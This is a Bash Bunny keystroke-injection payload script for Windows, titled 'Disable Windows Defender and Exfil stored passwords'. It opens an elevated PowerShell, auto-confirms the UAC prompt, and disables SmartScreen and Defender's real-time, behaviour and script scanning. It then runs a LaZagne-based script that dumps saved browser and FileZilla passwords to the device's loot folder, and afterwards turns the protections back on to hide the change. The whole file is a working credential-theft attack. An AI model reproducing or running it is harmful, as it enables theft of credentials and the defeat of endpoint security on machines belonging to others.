#!/bin/bash # # Title: Disable Windows Defender and Exfil stored passwords # Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... # This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. # This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz. # Author: rafa-guillermo # Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz # Version: 1.2 # Category: Credentials # Target: Windows # Tested On: Windows 11 # Attackmodes: HID, STORAGE # Options LOOTDIR=/root/udisk/loot/PasswordGrabber ######## Set-up ######## LED SETUP GET SWITCH_POSITION ATTACKMODE HID STORAGE DRIVE_LABEL=BashBunny ######## Make Loot Dir ######## # Setup named logs in loot directory mkdir -p $LOOTDIR ####### Open a powershell window with elevated privileges ####### LED STAGE1 RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\"" sleep 3 # wait for UAC prompt QUACK ALT y sleep 2 # Disable Windows Defender File Scan and and Real Time Protection QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force QUACK ENTER QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force QUACK ENTER QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value Off -Force QUACK ENTER QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$true QUACK ENTER QUACK STRING Set-MpPreference -DisableIOAVProtection \$true QUACK ENTER QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$true QUACK ENTER QUACK STRING Set-MpPreference -DisableScriptScanning \$true QUACK ENTER sleep 1 # Run laZagne LED STAGE2 QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)" QUACK ENTER QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\"" QUACK ENTER QUACK STRING \& \$scriptPath QUACK ENTER sleep 10 QUACK STRING exit QUACK ENTER # Re-enable Defender and Smart screen LED CLEANUP RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\"" sleep 3 # wait for UAC prompt QUACK ALT y sleep 2 QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force QUACK ENTER QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force QUACK ENTER QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value On -Force QUACK ENTER QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$false QUACK ENTER QUACK STRING Set-MpPreference -DisableIOAVProtection \$false QUACK ENTER QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$false QUACK ENTER QUACK STRING Set-MpPreference -DisableScriptScanning \$false QUACK ENTER sleep 1 QUACK STRING exit QUACK ENTER ######## FINISH ######## LED FINISH